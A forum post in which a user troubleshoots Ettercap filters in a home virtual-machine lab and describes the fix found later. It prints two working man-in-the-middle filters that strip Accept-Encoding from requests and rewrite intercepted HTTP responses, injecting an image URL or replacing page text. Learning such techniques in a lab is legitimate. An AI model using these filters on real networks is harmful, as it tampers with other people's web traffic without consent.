Ettercap Filter issue with Replace

Hi,

I have been pouring over the Internet and especially this forum the last few days to try to find an answer to my problem.
I see in the past many people have had issues with getting Ettercap Filters to work, and I guess I am now one of them :)

I just wanted to try the IronGeek Image Replacement script in my own Lab, which can be found here: http://www.irongeek.com/i.php?page=s...ettercapfilter

I'm running two VM's:

1. BT5 R3 Gnome 64 Bit (thought I have tried this now on BT4 R2, BT5, R2)
2. Windows XP SP2

The filter from the website is this one below:

Code:

---

if (ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
  }
}
if (ip.proto == TCP && tcp.src == 80) {
  replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
  replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
  msg("Filter Ran.\n");
}

---

With this one, no images are replaced however sometimes at the bottom of the page a line that might have a javascript src tag will be changed to the image link.
Wireshark shows that the TCP packets are coming in out of Order and calling for Retransmission. I can see inside that they are getting changed but - then it looks like a re-transmission occurs and they are getting replaced maybe?
I switched the script up some, and replaced it with one I found on this website to just change the Title Tag:

Code:

---

if (ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
  }
}

if (ip.proto == TCP && tcp.src == 80) {
  msg("in Second IF\n");
  if (search(DECODED.data, "Hello")){
      replace("Hello", "12345");
      msg("run\n");
  }

  if (search(DATA.data, "Google")){
      replace("Google", "GOOGLE HACKED");
      msg("run2\n");
  }
}

---

This one is even more interesting, as if a page has those keywords in it, I'll get a page cannot be displayed. On both I'm getting the msg's that the script is getting triggered.. /sigh
Any idea's?

I've uncommented the lines in etter.conf for the iptables.. I'm also only running ettercap with this, not sslstrip etc..

Thanks for any help you can provide :)

-DV

Just a quick follow up:

I figured out one problem, I was editing a different etter.conf file, it appears on BT5 R3 there are 2?
One in /etc/ and one in /usr/local/etc the second one being the one that the ettercap utility was using on my VM.

However, I am still running into the same issues, the web page will just remain unaltered and I keep seeing the TCP Out of Order messages.

Once again, thanks for any help in advance :)

I think I have isolated the problem, it appears that if I'm using VM's from VirtualBox the tests will fail.
However, if I use two separate computers or if I use VMWare it seems to work. Weird!